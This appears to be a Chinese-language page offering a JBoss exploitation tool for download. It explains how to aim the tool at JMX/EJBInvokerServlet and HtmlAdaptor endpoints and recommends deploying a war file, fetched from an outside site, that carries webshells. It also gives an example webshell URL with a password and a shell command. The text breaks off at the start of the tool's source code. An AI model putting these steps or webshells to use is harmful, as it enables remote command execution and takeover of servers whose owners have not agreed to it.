免责声明:本站提供的所有工具及代码仅供交流学习,不得用于商业或黑客行为。 下载地址:Jboss漏洞利用工具.jar 链接: 密码: ucdl 功能说明: 安装jdk并配置好环境变量,然后填好参数先点获取即可,成功后会返回"请求成功."。
1、JMX/EJBInvokerServlet:
host写IP或域名:127.0.0.1/p2j.cn
port必填,如:8080
2、HtmlAdaptor:
host写URL地址:http://localhost:8080
port不需填写
3、war包推荐使用:http://javaweb.org/is.war,is.war里面带有几个版本的一句话和一个cmd.jsp
(如:http://xxx.com/is/?cmd.jsp?pwd=023&cmd=ls)如果使用自己的war包,
cmd功能需要默认配置(/is/cmd.jsp)war包只自带了mysql数据库所需要的jar,
连接oracle等其他数据库需要自己添加jar包 截图-JMX/EJBInvokerServlet: 截图-HtmlAdaptor: 核心源码: package org.javaweb.jboss;
import java.io.BufferedReader;
import java.io.ByteArrayOutputStrea